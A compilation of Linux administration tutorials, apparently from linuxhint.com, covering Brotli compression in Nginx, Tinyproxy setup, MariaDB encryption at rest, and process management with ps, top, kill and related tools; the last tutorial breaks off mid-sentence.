How to Enable Brotli Compression in Nginx https://linuxhint.com/enable-brotli-compression-nginx/

Brotli is a general-purpose compression technique that is widely supported across browsers. Compared to the other compression methods currently available, it offers 20-26% better compression ratios. Nevertheless, it's no good unless the webserver sends text-based resources compressed with the Brotli algorithm.

In this article, we will learn how compression works on the server and why it is useful. We will also learn to install the Nginx server and configure it to serve Brotli-compressed files.

Background

Compression techniques/algorithms improve website performance by reducing the content size, so the compressed data takes less load and transfer time. However, it has a price: servers utilize a lot of computational resources to achieve a better compression ratio, and the better the ratio, the more expensive it is. So a great deal of effort goes into improving compression formats while utilizing minimum CPU cycles.

Until now, the most capable compression format in widespread use was gzip. Recently, gzip has been superseded by a new compression algorithm known as Brotli. It is an advanced compression algorithm composed of Huffman coding, the LZ77 algorithm, and context modeling. In contrast, gzip is built on the Deflate algorithm.

The lossless compression format, designed by Google, is closely related to the Deflate compression format. Both compression methods use sliding windows for back references. The Brotli sliding window size ranges from 1 KB to 16 MB, whereas gzip has a fixed window size of 32 KB. That means Brotli's window can be up to 512 times larger than the Deflate window, although this rarely matters in practice, as text files larger than 32 KB are uncommon on web servers.
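
As a quick illustration of the ratio difference, you can compare both compressors on the command line. This is only a hedged sketch: it assumes the brotli and gzip CLI tools are installed and uses index.html as a placeholder file name.

ubuntu@ubuntu:~$ sudo apt-get install brotli -y
ubuntu@ubuntu:~$ gzip -k -6 index.html
ubuntu@ubuntu:~$ brotli -k -q 6 index.html
ubuntu@ubuntu:~$ ls -l index.html index.html.gz index.html.br

The -k flag keeps the original file in both tools; at comparable quality levels, the .br file is usually noticeably smaller than the .gz file.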

Server Compression Compatibility is Important

Whenever we download a file with the browser, the browser tells the server what kind of compression it supports through a header. For instance, if the browser can decompress gzip and deflate, it adds these options to its Accept-Encoding header, i.e.,

Accept-Encoding: deflate, gzip

Hence, browsers that don't support these formats will not include them in the header. When the server responds with the content, it tells the browser about the compression format through the Content-Encoding header. Hence, if it serves gzip-compressed content, the header looks like this:

Content-Encoding: gzip

For a browser like Firefox that supports Brotli compression and a webserver that has a Brotli module installed, the headers look like these:

Accept-Encoding: deflate, gzip, br
Content-Encoding: br

Hence, if the browser supports the best compression format and the web server does not, it's no good, as the web server won't send back the files compressed with the preferred algorithm. That's why it is important to install the compression module for the webserver.
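
You can check what a server actually negotiates with a quick curl request. This is a sketch; the URL is a placeholder for your own site, and if the server supports Brotli the output should contain "content-encoding: br".

ubuntu@ubuntu:~$ curl -s -o /dev/null -D - -H "Accept-Encoding: br" https://example.com | grep -i content-encoding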

Server Installation

Before moving forward with the Brotli configuration, we will set up our Nginx server. First, update your Ubuntu distribution's package lists, then type in the following commands in your bash terminal.

ubuntu@ubuntu:~$ sudo apt-get update
ubuntu@ubuntu:~$ sudo apt-get install nginx -y
ubuntu@ubuntu:~$ sudo service nginx start

To enable Brotli compression in Nginx, we will compile our .so modules to match our Nginx version. Typing the following command will output the Nginx version:

ubuntu@ubuntu:~$ nginx -v
nginx version: nginx/1.18.0 (Ubuntu)

Use the wget command along with your nginx version detail to download the source code from the Nginx website.

ubuntu@ubuntu:~$ wget https://nginx.org/download/nginx-1.18.0.tar.gz
--2021-02-07 02:57:33--  https://nginx.org/download/nginx-1.18.0.tar.gz
Resolving nginx.org (nginx.org)... 3.125.197.172, 52.58.199.22, 2a05:d014:edb:5702::6, ...
Connecting to nginx.org (nginx.org)|3.125.197.172|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1039530 (1015K) [application/octet-stream]
Saving to: 'nginx-1.18.0.tar.gz'

nginx-1.18.0.tar.gz             100%[==================================================================>]   1015K   220KB/s in 4.8s

2021-02-07 02:57:38 (212 KB/s) - ‘nginx-1.18.0.tar.gz’ saved [1039530/1039530]

We will use this source code to compile *.so binaries for Brotli compression. Now extract the file using the following command.

ubuntu@ubuntu:~$ tar xzf nginx-1.18.0.tar.gz

Brotli Module Configuration

Google has released a Brotli module for Nginx. We will git-clone the module from the Google repository.

ubuntu@ubuntu:~$ git clone https://github.com/google/ngx_brotli --recursive

We will cd into the nginx-1.18.0 folder to configure the dynamic Brotli module.

ubuntu@ubuntu:~$ cd nginx-1.18.0/
ubuntu@ubuntu:~$ sudo ./configure --with-compat --add-dynamic-module=../ngx_brotli

Note: You may receive the following error while configuring

./configure: error: the HTTP rewrite module requires the PCRE library.
You can either disable the module by using --without-http_rewrite_module
option, or install the PCRE library into the system, or build the PCRE library
statically from the source with nginx by using --with-pcre=<path> option.

In that case, run the following command to install the pcre library

ubuntu@ubuntu:~$ sudo apt-get install libpcre3-dev -y

Module Compilation

We will use the make command to build the dynamic modules inside the nginx-1.18.0 directory; the compiled binaries are placed in the objs subfolder.

ubuntu@ubuntu:~$ sudo make modules

We use the cp command to copy ngx_http_brotli*.so files from the nginx-1.18.0/objs folder to the modules folder.

ubuntu@ubuntu:~$ cd ~/nginx-1.18.0/objs/
ubuntu@ubuntu:~$ sudo cp ngx_http_brotli*.so /usr/share/nginx/modules

Now list the content of the files using the ls command. You will notice that it consists of two different module files, i.e.:

ubuntu@ubuntu:~$ ls ngx_http_brotli*.so

ngx_http_brotli_filter_module.so
ngx_http_brotli_static_module.so
  • Regular Brotli Module: The ngx_http_brotli_filter_module.so module compresses all responses on the fly, and hence it requires more computational resources.
  • Static Brotli Module: The ngx_http_brotli_static_module.so module serves pre-compressed static files and is therefore less resource-intensive (see the pre-compression example after this list).
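
For the static module, you pre-compress the assets yourself so that Nginx only has to serve them. The following is a hedged sketch: it assumes /var/www/html is your web root and uses style.css as a placeholder file name; the resulting style.css.br will be served once brotli_static is on and the client sends Accept-Encoding: br.

ubuntu@ubuntu:~$ cd /var/www/html
ubuntu@ubuntu:~$ sudo brotli -k -q 11 style.css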

Now use your favorite editor to open the /etc/nginx/nginx.conf file and begin the Brotli configuration by adding the following load_module lines:

ubuntu@ubuntu:~$ sudo vim /etc/nginx/nginx.conf

# Load module section
load_module "modules/ngx_http_brotli_filter_module.so";
load_module "modules/ngx_http_brotli_static_module.so";

We will also include the configuration folder paths /etc/nginx/conf.d/*.conf and /usr/share/nginx/modules/*.conf in the above file, such as:

http {
# Include configs folders
include /etc/nginx/conf.d/*.conf;
include /usr/share/nginx/modules/*.conf;
}

To add the Brotli configuration, open the /etc/nginx/conf.d/brotli.conf file in the vim editor and enable Brotli by setting the following configuration directives:

brotli     on;
brotli_static        on;
brotli_comp_level          6;
brotli_types         application/rss+xml application/xhtml+xml
text/css text/plain;

The “brotli off|on” value enables or disables dynamic or on the fly compression of the content.

The “brotli_static on” directive makes the Nginx server check whether pre-compressed files with the .br extension exist. This directive can also be set to off or always. The always value allows the server to send pre-compressed content without confirming whether the browser supports it. Since on-the-fly Brotli is resource-intensive, serving pre-compressed files is best suited to reducing bottlenecks.

The “brotli_comp_level 6” directive sets the dynamic compression quality level to 6. It can range from 0 to 11.

Lastly, enable dynamic compression for specific MIME types; text/html responses are always compressed. The default syntax for this directive is brotli_types [mime type]. You can find more about the configuration directives on GitHub.

Save the changes and restart the Nginx service by typing “sudo service nginx restart”, and it's all done.
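
A quick sanity check, assuming Nginx serves a default page on localhost: test the configuration, restart, and ask for the page with Brotli in the Accept-Encoding header. Since text/html is always compressed when brotli is on, the response header should show br.

ubuntu@ubuntu:~$ sudo nginx -t
ubuntu@ubuntu:~$ sudo service nginx restart
ubuntu@ubuntu:~$ curl -s -o /dev/null -D - -H "Accept-Encoding: br" http://localhost/ | grep -i content-encoding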

Conclusion

After the changes, you will notice some obvious improvements in the performance metrics. However, it does come with the slight drawback of increased CPU load at peak times. To avoid such situations, keep an eye on CPU usage; if it reaches 100% regularly, there are many options we can use as per our preferences, such as serving pre-compressed or static content, lowering the compression level, and turning off on-the-fly compression, among others.

How To Install And Setup TinyProxy On Your Linux Server https://linuxhint.com/install-tinyproxy-linux/

Tinyproxy is an HTTP/HTTPS proxy. It is a lightweight, fast, very easy to configure, open-source proxy service, and it can be configured as a reverse proxy as well. Because it is so lightweight, it is a good choice as a small proxy on systems with limited resources.

Features

  • Tinyproxy is easy to configure and modify.
  • A small memory footprint: it occupies very little memory, roughly 2 MB.
  • Anonymous mode allows you to specify which individual HTTP headers should be allowed through and which should not.
  • Access control blocks unauthorized users.
  • Filtering allows the user to block or allow a certain domain by creating a blacklist and whitelist.
  • Privacy features control both incoming and outgoing data from the HTTPS/HTTP servers.

Install TinyProxy

Update system packages by typing the following command.

ubuntu@ubuntu:~$ sudo  apt-get  update
ubuntu@ubuntu:~$ sudo  apt-get  upgrade -y

Once the update completes, install Tinyproxy by typing this command.

ubuntu@ubuntu:~$ sudo apt-get -y install tinyproxy

Tinyproxy will be installed. To start and check the status of Tinyproxy, type these commands.

ubuntu@ubuntu:~$ sudo systemctl start tinyproxy
ubuntu@ubuntu:~$ sudo systemctl status tinyproxy

Configure Web Browser

To make Tinyproxy work, you have to change some settings in your web browser. To do so, go into your web browser's network settings, click on manual proxy configuration, and in the HTTP proxy field, enter the public IP address of the server running Tinyproxy along with the port number (by default, the Tinyproxy port is 8888).

You can also use FoxyProxy to configure your web browser. It is a proxy management tool that goes well beyond Firefox's limited built-in proxy configuration. It is an extension for the Firefox and Chrome web browsers and can be downloaded from their stores.

Tinyproxy Configuration

The Tinyproxy configuration file is located at “/etc/tinyproxy/tinyproxy.conf”.

To access it, type the following command.

ubuntu@ubuntu:~$ cat /etc/tinyproxy/tinyproxy.conf

To make changes in the Tinyproxy configuration file, open it using vim.

ubuntu@ubuntu:~$ sudo vim /etc/tinyproxy/tinyproxy.conf

Go to the line Allow 127.0.0.1 and change it with your public IP Address.

Now go to the line #Listen 192.168.0.1. Uncomment this line and replace the address with your server's IP address.

Allow and Block Range of User IPs

Tinyproxy allows you to permit or block a single user IP or a range of IPs. To allow a user IP, go to the line Allow 127.0.0.1 and, below this line, add the addresses you want in the form Allow [IP_Address]. To allow a range of IP addresses, add a line of the following form just below the existing Allow lines:

Allow [IP_Address/range]

To block a user IP or a range of IPs, simply comment out or remove the corresponding Allow line. In Tinyproxy, any IP that is not explicitly allowed is blocked.
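
To make this concrete, here is a hedged example of what the access-control section of /etc/tinyproxy/tinyproxy.conf might look like; all addresses below are placeholders.

Allow 127.0.0.1
Allow 192.168.10.25
Allow 192.168.10.0/24
#Allow 203.0.113.77

Here the local machine, one trusted client, and one subnet are permitted, while the commented-out address stays blocked.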

Authorization

In Tinyproxy, you can set up authorization so that only authorized users can access the proxy. To set up the credentials, go to the line #BasicAuth user password, uncomment it, and replace user and password with your own username and password:

BasicAuth [username] [password]

Adding Filter

You can also add a traffic filter by blocking websites using tinyproxy. Follow the instructions for adding traffic filters.

Go to the line #Filter “/etc/tinyproxy/filter” and uncomment it. You can apply the filter to URLs or domains. Also, below this line, uncomment the lines “FilterExtended On” and “FilterDefaultDeny Yes”.

Save the changes and add domains of the websites you want to block in the filter file. You can access the filter file in the “/etc/tinyproxy/filter” path. So open it using vim.

ubuntu@ubuntu:~$ sudo vim /etc/tinyproxy/filter

Add the domains line by line. You can add any and as many domains as you want to block.

Any time you make any changes in the filter list or tinyproxy configuration file, you must restart the tinyproxy service. To restart the tinyproxy service type command.

ubuntu@ubuntu:~$ sudo service tinyproxy restart

Now allow the proxy port through the firewall by typing the following command.

ubuntu@ubuntu:~$ sudo iptables -A INPUT -j ACCEPT -m comment --comment "tinyproxy" -s 192.163.28.73/24 -p tcp --dport 8888
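
To quickly confirm that the proxy is reachable, you can send a test request through it with curl from an allowed client machine. This is a sketch; replace the placeholder address with your server's public IP.

ubuntu@ubuntu:~$ curl -x http://YOUR_SERVER_IP:8888 -I http://example.com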

Regulate TinyProxy Using Cron Job

If you want to schedule when Tinyproxy starts, restarts, or stops, you can do it with the Linux cron facility. A cron entry follows the pattern: minute, hour, day of the month, month, day of the week, followed by the command to run. To edit the cron table, type crontab -e.

To schedule the starting time of tinyproxy, type the following commands.

0 6 * * * /etc/init.d/tinyproxy start

To schedule the stopping time of tinyproxy, type the following commands.

0 23 * * * /etc/init.d/tinyproxy stop

This means the tinyproxy service will automatically start at 6 am and stop at 11 pm every day.

Conclusion

Tinyproxy is a useful and easy tool for setting up an HTTP/HTTPS proxy. It is intended for small servers; if you want a proxy server for larger networks, you might want to look at Squid instead. We have shared only some tips here, but they are enough to get started. Using this simple guide on how to install, configure, and use Tinyproxy, you will be able to set up your own proxy.

Encryption at Rest in MariaDB https://linuxhint.com/configure-database-level-encryption-mariadb/

Encryption-at-rest prevents an attacker from accessing encrypted data stored on the disk even if they have access to the system. The open-source databases MySQL and MariaDB now support an encryption-at-rest feature that meets the demands of new EU data protection legislation. MySQL encryption at rest is slightly different from MariaDB's, as MySQL only provides encryption for InnoDB tables, whereas MariaDB also provides an option to encrypt files such as redo logs, slow logs, audit logs, error logs, etc. However, neither can encrypt data in RAM or protect it from a malicious root user.

In this article, we will learn to configure database-level encryption for MariaDB.

Getting Started

The data at rest encryption requires an encryption plugin along with the key management. The encryption plugin is responsible for managing the encryption key as well as encrypting/decrypting the data.

MariaDB provides three encryption key management solutions, so how your database manages the encryption key depends on the solution you are using. This tutorial will demonstrate database-level encryption using the MariaDB File Key Management solution. However, this plugin does not provide a key rotation feature.

If you are using a LAMP server, the files to add this plugin are located in the “/opt/lamp” directory. If not, then the changes are made in the “/etc/mysql/conf.d” folder.

Creating Encryption Keys

Before encrypting the database using the File key management plugin, we need to create the files containing encryption keys. We will create a file with two pieces of information. That’s an encryption key in a hex-encoded format along with a 32-bit key identifier.

We will create a new folder “keys” in the “/etc/mysql/” directory and use the OpenSSL utility to randomly generate 3 Hex strings and redirect the output to a new file in the keys folder. Type in the following commands:

ubuntu@ubuntu:~$ sudo mkdir /etc/mysql/keys
ubuntu@ubuntu:~$ echo "1;$(openssl rand -hex 32)" | sudo tee /etc/mysql/keys/enc_keys.txt
ubuntu@ubuntu:~$ echo "2;$(openssl rand -hex 32)" | sudo tee -a /etc/mysql/keys/enc_keys.txt
ubuntu@ubuntu:~$ echo "3;$(openssl rand -hex 32)" | sudo tee -a /etc/mysql/keys/enc_keys.txt

Where 1,2,3 are the key identifiers; we include them to create a reference to the encryption keys using variable innodb_default_encryption_key_id in MariaDB. The output file will look like this:

1;01495ba35e1c9602e14e40bd6de41bb8
2;3cffa4a5d288e90108394dbf639664f8
3;9953297ed1a58ae837486318840f5f1d

Key File Encryption

We could simply point the system variable file_key_management_filename of the File Key Management plugin at this file. But it's not secure to leave the keys in plain text. We can reduce the risk to some extent by restricting file permissions, but that isn't sufficient.

Now we will encrypt the previously created keys using a randomly generated password. The AES key size can be 128, 192, or 256 bits.

ubuntu@ubuntu:~$ openssl rand -hex 192 | sudo tee /etc/mysql/keys/enc_paswd.key

We will then use the openssl enc command in the terminal to encrypt the enc_keys.txt file into enc_keys.enc, using the password file created above. Note that MariaDB only supports the CBC mode of AES for encrypting its key file.

ubuntu@ubuntu:~$ sudo openssl enc -aes-256-cbc -md sha1 -pass file:/etc/mysql/keys/enc_paswd.key -in /etc/mysql/keys/enc_keys.txt -out /etc/mysql/keys/enc_keys.enc && sudo rm /etc/mysql/keys/enc_keys.txt

We also delete our enc_keys.txt file as it is no longer required. Besides, we can always decrypt our data in MariaDB as long as our password file is secure.
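
If you ever want to verify that the password file can still recover the keys, the encryption command above can be reversed with the -d flag; this is optional and only prints the three key lines to the terminal.

ubuntu@ubuntu:~$ sudo openssl enc -d -aes-256-cbc -md sha1 -pass file:/etc/mysql/keys/enc_paswd.key -in /etc/mysql/keys/enc_keys.enc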

Configuring File Key Management Plugin

We will now configure MariaDB with the File Key Management plugin by adding the following variables to the configuration file. The configuration files are usually located in ‘/etc/mysql’, which reads all the .cnf files by default. Alternatively, you can create a new configuration file “mariadb_enc.cnf” under the ‘/etc/mysql/conf.d/’ directory.

Now your configuration file may look entirely different from this. However, add these encryption variables under [mysqld]. If the key file is encrypted, the plugin requires two system variables to be configured, i.e., file_key_management_filename and file_key_management_filekey.

[mysqld]

#File Key Management Plugin
plugin_load_add = file_key_management
file_key_management = ON
file_key_management_encryption_algorithm = aes_cbc
file_key_management_filename = /etc/mysql/keys/enc_keys.enc
file_key_management_filekey = /etc/mysql/keys/enc_paswd.key

# InnoDB/XtraDB Encryption Setup
innodb_default_encryption_key_id = 1
innodb_encrypt_tables = ON
innodb_encrypt_log = ON
innodb_encryption_threads = 4

# Aria Encryption Setup
aria_encrypt_tables = ON

# Temp & Log Encryption
encrypt-tmp-disk-tables = 1
encrypt-tmp-files = 1
encrypt_binlog = ON

You can find details for each system variable from the official MariaDB website.

Securing The Password File

We will change the permissions of our MySQL keys directory to secure the password and other sensitive files. The directory ownership will be changed to the mysql user, which is the account the MariaDB server runs under on Ubuntu.

sudo chown -R mysql:root /etc/mysql/keys
sudo chmod 500 /etc/mysql/keys/

Now we will change the password and encrypted key file permissions as follows:

sudo chown mysql:root /etc/mysql/keys/enc_paswd.key /etc/mysql/keys/enc_keys.enc

sudo chmod 600 /etc/mysql/keys/enc_paswd.key /etc/mysql/keys/enc_keys.enc

Now restart the database service.

sudo service mysql restart
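
To check that the plugin loaded and encryption is active, you can query the relevant information_schema table. This is a hedged sketch: if the File Key Management plugin loaded correctly, the table should list tablespaces and their key versions; an error or an empty result suggests the plugin did not load.

ubuntu@ubuntu:~$ sudo mysql -e "SELECT * FROM information_schema.INNODB_TABLESPACES_ENCRYPTION\G"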

Conclusion

In this article, we have learned why database-level encryption is the need of the hour and how to configure encryption-at-rest in MariaDB. The only drawback of the File Key Management plugin is that it does not support key rotation. However, apart from this plugin, there are many other key management encryption solutions, e.g., the AWS Key Management Plugin and the Eperi Key Management Plugin. You can find more details on these plugins on MariaDB's official website.

Managing Processes In Ubuntu Linux https://linuxhint.com/manage-processes-ubuntu-linux/

Managing processes in Linux is an important topic to learn and understand, as Linux is a multitasking operating system with many processes running at the same time. Linux provides many tools for managing processes, like listing running processes, killing processes, monitoring system usage, etc. In Linux, every process is represented by its process ID (PID). There are other attributes as well, such as the user ID and group ID of the user or group that runs the process. Sometimes you need to kill or interact with a process, so you should know how to manage these processes to keep your system running smoothly. In Linux, processes can be managed with commands like ps, pstree, pgrep, pkill, lsof, top, nice, renice, and kill, etc.

Processes

Running an instance of a program is called a process. In Linux, each process is identified by its process ID (PID), which is unique for every process. There are two types of processes:

  • Background processes
  • Foreground processes

Background Processes

Background processes are started in the terminal and run without occupying it. If you run a process in the terminal, its output is displayed in the terminal window and you can interact with it; but if you don't need to interact with the process, you can run it in the background. To run a process in the background, just add an “&” sign at the end of the command, and it will start running in the background; this saves you time and lets you start another process. For listing processes running in the background, use the ‘jobs’ command. It will display all the processes running in the background.

For example, upgrading is a long process in Linux. It takes too much time, and if you want to do other stuff while the system is upgrading, use the background command.

ubuntu@ubuntu:~$ sudo apt-get upgrade -y &

It will start running in the background. And you can interact with other programs in the meanwhile. You can check how many and which processes are running in the background by typing this command.

ubuntu@ubuntu:~$ jobs
[1]+ Running sudo apt-get upgrade -y &

Foreground processes

All the processes that we run in the terminal are, by default, run as foreground processes. We can manage them with the fg and bg commands.

You can bring any background process listed in jobs to the foreground by typing the ‘fg’ command followed by the background process number.

ubuntu@ubuntu:~$ fg %1
sudo apt-get upgrade -y

And if you want to take this process to the background type this command.

ubuntu@ubuntu:~$ bg %1

Listing and managing processes with ps command

The listing process with the ps command is one of the oldest ways to view the terminal running processes. Type ps command to list which processes are running and how much system resource they are using and who is running them.

ubuntu@ubuntu:~$ ps u
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
Jim 1562 0.0 0.0 164356 6476 tty2 Ssl+ 13:07 0:00 shell
Jim 1564 5.2 0.9 881840 78704 tty2 Sl+ 3:07 13:13 dauth
Jim 2919 0.0 0.0 11328 4660 pts/0 Ss 13:08 0:00 bash
Jim 15604 0.0 0.0 11836 3412 pts/0 R+ 17:19 0:00 ps u
...snip...

In the above table, the USER column shows the user name and PID shows the process ID. You can use the PID to kill a process or send it a kill signal. %CPU shows the CPU usage percentage, and %MEM shows the random access memory usage. To kill a process, type:

ubuntu@ubuntu:~$ kill [ process id (PID) ]

or

ubuntu@ubuntu:~$ kill -9 [ process id (PID) ]

Use the ps aux command to see all running processes and add a pipe to see it in order.

ubuntu@ubuntu:~$ ps aux | less

If you want to rearrange the columns, you can do so by adding the -e flag to list all the processes and the -o flag to specify the columns by keywords in the ps command.

ubuntu@ubuntu:~$ ps -eo pid,user,uid,%cpu,%mem,vsz,rss,comm
PID USER UID %CPU %MEM VSZ RSS COMMAND
1 root 0 0.1 0.1 167848 11684 systemd
3032 jim 1000 16.5 4.7 21744776 386524 chrome
...snip...

Options for ps command.

u option is used for listing the processes by the users.

ubuntu@ubuntu:~$ ps u

f option is used to display the process hierarchy (forest view).

ubuntu@ubuntu:~$ ps f

x option is used to display information about the process without a terminal.

ubuntu@ubuntu:~$ ps x

e option is used to show the environment after the command.

ubuntu@ubuntu:~$ ps e

a option is used for listing all the processes with the terminal.

ubuntu@ubuntu:~$ ps a

v option is used to display virtual memory format.

ubuntu@ubuntu:~$ ps v

Flags for ps command.

-e flag is used to see every process on the system.

ubuntu@ubuntu:~$ ps -e

-u flag is used to see processes running as a specific user, e.g., root.

ubuntu@ubuntu:~$ ps -u root

-f flag is used for a full listing of processes.

ubuntu@ubuntu:~$ ps -f

-o flag is used for specifying which columns to display.

ubuntu@ubuntu:~$ ps -eo pid,user,comm
pstree

pstree is another command to list the processes; it shows the output in a tree format.

ubuntu@ubuntu:~$ pstree

Options for pstree command

-n is used for sorting processes by PID.

ubuntu@ubuntu:~$ pstree -n

-H is used for highlighting processes.

ubuntu@ubuntu:~$ pstree -H [PID]
ubuntu@ubuntu:~$ pstree -H 6457

-a is used for showing output, including command-line arguments.

ubuntu@ubuntu:~$ pstree -a

-g is used for showing processes by group id.

ubuntu@ubuntu:~$ pstree -g

-s is used for showing the tree of a specific process.

ubuntu@ubuntu:~$ pstree -s [PID]
ubuntu@ubuntu:~$ pstree -s 6457

[userName] is used for showing processes owned by a user.

ubuntu@ubuntu:~$ pstree [userName]
ubuntu@ubuntu:~$ pstree jim
pgrep

With the pgrep command, you can find a running process based on certain criteria. You can search by the full name or an abbreviation of the process name, by username, or by other attributes. The pgrep command follows this pattern:

ubuntu@ubuntu:~$ pgrep [option] [pattern]
ubuntu@ubuntu:~$ pgrep -u jim chrome
Options for pgrep command

-i is used for case-insensitive searching

ubuntu@ubuntu:~$ pgrep -i firefox

-d is used for delimiting the output

ubuntu@ubuntu:~$ pgrep -u jim -d:

-u is used for finding processes owned by a user

ubuntu@ubuntu:~$ pgrep -u jim

-a is used for listing processes alongside their commands

ubuntu@ubuntu:~$ pgrep -u jim -a

-c is used for showing the count of matching processes

ubuntu@ubuntu:~$ pgrep -c -u jim

-l is used for listing processes and their name

ubuntu@ubuntu:~$ pgrep -u jim -l
pkill

With the pkill command, you can send a signal to a running process based on certain criteria. You can match by the full name or an abbreviation of the process name, by username, or by other attributes. The pkill command follows this pattern:

ubuntu@ubuntu:~$ pkill [options] [pattern]
ubuntu@ubuntu:~$ pkill -9 chrome
Options for pkill command

--signal is used for sending a specific signal, e.g., SIGKILL, SIGTERM, etc.

ubuntu@ubuntu:~$ pkill --signal SIGTERM vscode

-HUP is used for reloading a process

ubuntu@ubuntu:~$ pkill -HUP syslogd

-f is used for killing processes based on the full command line.

ubuntu@ubuntu:~$ pkill -f "ping 7.7.7.7"

-u is used for killing all the processes owned by a user.

ubuntu@ubuntu:~$ pkill -u jim

-i is used for case-insensitive matching of the process name.

ubuntu@ubuntu:~$ pkill -i firefox

-9 is used for sending a kill signal.

ubuntu@ubuntu:~$ pkill -9 chrome

-15 is used for sending a termination signal.

ubuntu@ubuntu:~$ pkill -15 vlc
lsof (List of Open Files)

This command-line utility is used for listing the files opened by processes. And as we know, UNIX/Linux systems treat everything as a file, so it is convenient to use the lsof command to list all opened files.

ubuntu@ubuntu:~$ lsof

In the output of the lsof command, FD represents the file descriptor, cwd represents the current working directory, txt means text file, mem means memory-mapped file, mmap means memory-mapped device, REG represents a regular file, DIR represents a directory, and rtd means root directory. There are other options you can use with the lsof command.

Options for lsof command.

-c is used for the listing of open files by their process name.

ubuntu@ubuntu:~$ lsof -c chrome

-u is used for the listing of open files by a user.

ubuntu@ubuntu:~$ lsof -u jim

-i is used for the listing of processes executing on a port.

ubuntu@ubuntu:~$ lsof -i

+D is used for the listing of open files under a directory.

ubuntu@ubuntu:~$ lsof +D /home/

-p is used for the listing of open files by a process.

ubuntu@ubuntu:~$ lsof -p 1342

Listing and Managing Process With top Command

With the top command, you can display a real-time view of running system processes. By default it displays the processes sorted by CPU usage, and you can sort the columns as you like. The top command also provides information about your system, such as how long the system has been up, how many users are logged in, how many processes are running, how much CPU and RAM is being used, and a listing of each process.

Type the command top to list down the processes running.

ubuntu@ubuntu:~$ top

Tasks: 291 total, 1 running, 290 sleeping, 0 stopped, 0 zombie
%Cpu(s) : 2.3us, 0.3sy, 0.0ni, 97.0id, 0.3wa, 0.0hi, 0.0si, 0.0st
MiB Mem: 7880.6 total, 1259.9 free, 3176 used, 3444.4 buff/cache
MiB Swap: 2048.0 total, 2048.0 free, 0.0 used. 4091.8 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3241 jim 20 0 20.7g 33512 10082 S 1.7 4.2 0:54.24 chrome
3327 jim 20 0 4698084 249156 86456 S 1.3 3.1 1:42.64 chrome
2920 jim 20 0 955400 410868 14372 S 1.0 5.1 7:51.04 chrome
3423 jim 20 0 4721584 198500 10106 S 1.0 2.5 0:49.00 chrome
3030 jim 20 0 458740 114044 66248 S 0.7 1.4 3:00.47 chrome
3937 jim 20 0 4610540 104908 72292 S 0.7 1.3 0:05.91 chrome
1603 jim 20 0 825608 67532 40416 S 0.3 0.8 3:13.52 Xorg
1756 jim 20 0 4154828 257056 10060 S 0.3 3.2 5:53.31 gnome-s+
1898 jim 20 0 289096 29284 5668 S 0.3 0.4 1:06.28 fusuma
3027 jim 20 0 587580 14304 75960 S 0.3 1.8 9:43.59 chrome
3388 jim 20 0 4674192 156208 85032 S 0.3 1.9 0:13.91 chrome
3409 jim 20 0 4642180 140020 87304 S 0.3 1.7 0:15.36 chrome
3441 jim 20 0 16.5g 156396 89700 S 0.3 1.9 0:25.70 chrome
….snip….

You can also do some actions with the top command to make changes in running processes; here is the list below.

  • u: by pressing “u” you can display the processes run by a certain user.
  • M: by pressing “M” you can sort by RAM usage rather than CPU usage.
  • P: by pressing “P” you can sort by CPU usage.
  • 1: by pressing “1” you can switch between aggregate and per-CPU usage if there is more than one CPU.
  • R: by pressing “R” you can reverse the sort order of the output.
  • h: by pressing “h” you can go to help, and press any key to return.

Note which processes are consuming the most memory or CPU. Processes that consume too much memory can be killed, and processes that consume too much CPU can be reniced to give them lower priority on the processor.
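
Outside of top, a quick way to spot the heaviest processes is to sort the ps output; this small sketch uses the --sort option of procps ps:

ubuntu@ubuntu:~$ ps aux --sort=-%mem | head -6
ubuntu@ubuntu:~$ ps aux --sort=-%cpu | head -6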

Kill a process in top: press k and enter the process ID you want to kill, then type 15 or 9 to kill it normally or immediately; you can also kill a process with the kill or killall command.

Renice a process in top: press r and enter the PID of the process you want to renice. It will ask you to type the PID of the process and then the nice value you want to give it, between -20 and 19 (-20 means the highest priority and 19 the lowest).

Listing & Managing Processes With System Monitor

Linux has the GNOME System Monitor to show running processes more dynamically. To start the System Monitor, press the Super (Windows) key, type “system monitor,” and click on its icon; you will see the processes listed in columns. By right-clicking a process, you can kill, stop, or renice it.

The running processes are displayed with user accounts in alphabetical order. You can sort the processes by any field headings like CPU, Memory, etc., just click on them, and they will be sorted; for example, click on CPU to see which process is consuming the most CPU power. To manage processes, right-click on them and select the option you want to do with the process. To manage the process select the following options.

  • Properties- show other settings related to a process.
  • Memory Maps- show system memory maps to show which library and other components are being used in memory for the process.
  • Open file- shows which files are opened by the process.
  • Change Priority- display a sidebar from which you can renice the process with the options from very high to very low and custom.
  • Stop- pauses the process until you select to continue.
  • Continue- restarts a paused process.
  • Kill- Force kills a process instantly.

Killing a process with kill and killall

The kill and killall commands are used for killing/ending a running process. These commands can also be used for sending a valid signal to a running process, such as telling a process to continue, to terminate, or to reread its configuration files. Signals can be written either by number or by name. The following are some commonly used signals.

Signal Number Description
SIGHUP 1 Hang-up detected on the controlling terminal.
SIGINT 2 Interrupt from the keyboard.
SIGQUIT 3 Quit from the keyboard.
SIGILL 4 Illegal instruction.
SIGTRAP 5 Trace/breakpoint trap.
SIGABRT 6 Abort signal from abort(3).
SIGKILL 9 Used for sending a kill signal.
SIGTERM 15 Used for sending a termination signal.
SIGCONT 19,18,25 Used to continue a process if stopped.
SIGSTOP 17,19,23 Used for stopping processes.

Different numeric values for SIGCONT and SIGSTOP are used in different Unix/Linux operating systems. For detailed information about signals, type man 7 signal in the terminal.

Using kill Command For Sending Signal To Process By PID.

Note the process to which you want to send a kill signal. You can find the process id (PID) by ps or top command.

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

7780 jim 20 0 12596 4364 3460 R 33.3 3.2 13:54:12 top

The top process is consuming 33.3% of the CPU. If you want to kill this process to save CPU usage, here are some ways to end this process with the kill command.

ubuntu@ubuntu:~$ kill 7780

ubuntu@ubuntu:~$ kill -15 7780 or $ kill -SIGTERM 7780

ubuntu@ubuntu:~$ kill -9 7780 or $ kill -SIGKILL 7780

Using killall Command To Send Signals To A Process By Name.

With the killall command, you don’t have to search for process id; you can send a kill signal to a process by name rather than process id. It can also kill more processes than you want if you are not careful, e.g., “killall chrome” will kill all chrome processes, including those you don’t want to kill. Sometimes it is useful to kill processes of the same name.

Like the kill command, killall accepts signals by name or by number. To kill any running process with the killall command, you only have to type its name and the signal you want to send. For example, to send a kill signal to the firefox process using the killall command, write the command below.

